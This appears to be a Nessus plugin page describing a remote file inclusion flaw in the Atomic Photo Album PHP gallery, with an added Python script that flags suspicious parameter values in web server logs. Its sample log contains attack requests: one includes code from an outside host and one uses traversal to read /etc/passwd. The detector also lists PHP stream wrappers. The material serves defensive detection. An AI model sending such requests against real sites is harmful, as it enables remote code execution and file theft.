Atomic Photo Album apa_module_basedir Parameter Remote File Inclusion

High Nessus Network Monitor Plugin ID 3111


The remote host is vulnerable to a Script Injection attack.


The remote host is running Atomic Photo Album, a free PHP-based photo gallery. The installed version of Atomic Photo Album allows remote attackers to control the 'apa_module_basedir' variable used when including PHP code in the '' script. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts.


Enable PHP's 'magic_quotes_gpc' setting and disable 'allow_url_fopen'.
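As an added detection example (not part of the Tenable plugin or of Atomic Photo Album), the Python below scans web-server access-log lines for 'apa_module_basedir' values that would turn the include into a remote or arbitrary-file inclusion, which is the condition the description above warns about. The log lines are constructed, and the script path is a placeholder because the page does not name the affected script.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "apa_module_basedir"
# Value shapes that turn a PHP include() of "$basedir/..." into remote or
# arbitrary-file inclusion: URL schemes, stream wrappers, traversal, absolute paths.
REMOTE_SCHEME = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")   # http://, ftp://, ...
WRAPPER = re.compile(r"^(php|data|expect|phar)://", re.I)    # PHP stream wrappers


def classify_basedir(value: str) -> str:
    """Return 'ok', 'remote', 'wrapper', 'traversal' or 'absolute' for one value."""
    if "\x00" in value or "%00" in value.lower():
        return "traversal"      # null byte truncates the filename PHP appends
    if WRAPPER.match(value):
        return "wrapper"
    if REMOTE_SCHEME.match(value):
        return "remote"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    if value.startswith("/") or re.match(r"^[a-zA-Z]:[\\/]", value):
        return "absolute"
    return "ok"


# Common/combined log format request field: "GET /path?query HTTP/1.1"
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Yield (verdict, value) for every suspicious apa_module_basedir seen."""
    findings = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so %2e%2e and %00 are caught as well
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in qs.get(PARAM, []):
            verdict = classify_basedir(value)
            if verdict != "ok":
                findings.append((verdict, value))
    return findings


# Constructed sample log; /apa/PLACEHOLDER.php stands in for the unnamed script.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jul/2005:10:00:01 +0000] "GET /apa/PLACEHOLDER.php?apa_module_basedir=modules HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jul/2005:10:00:02 +0000] "GET /apa/index.php HTTP/1.1" 200 2048',
    '198.51.100.7 - - [25/Jul/2005:10:01:09 +0000] "GET /apa/PLACEHOLDER.php?apa_module_basedir=http://203.0.113.9/ HTTP/1.0" 200 77',
    '198.51.100.7 - - [25/Jul/2005:10:01:10 +0000] "GET /apa/PLACEHOLDER.php?apa_module_basedir=../../../../etc/passwd%00 HTTP/1.0" 200 1400',
]

if __name__ == "__main__":
    for verdict, value in scan_access_log(SAMPLE_LOG):
        print(f"{verdict}: {value!r}")
```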

Plugin Details

Severity: High

ID: 3111

File Name: 3111.prm

Family: CGI

Published: 2005/07/25

Modified: 2016/01/22

Dependencies: 1442

Nessus ID: 19299

Risk Information

Risk Factor: High

CVSS v2.0

Base Score: 7.5

Temporal Score: 7.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Temporal Vector: CVSS2#E:H/RL:W/RC:ND

CVSS v3.0

Base Score: 7.3

Temporal Score: 7.1

Temporal Vector: CVSS3#E:H/RL:W/RC:X

Reference Information

CVE: CVE-2005-2413

BID: 14368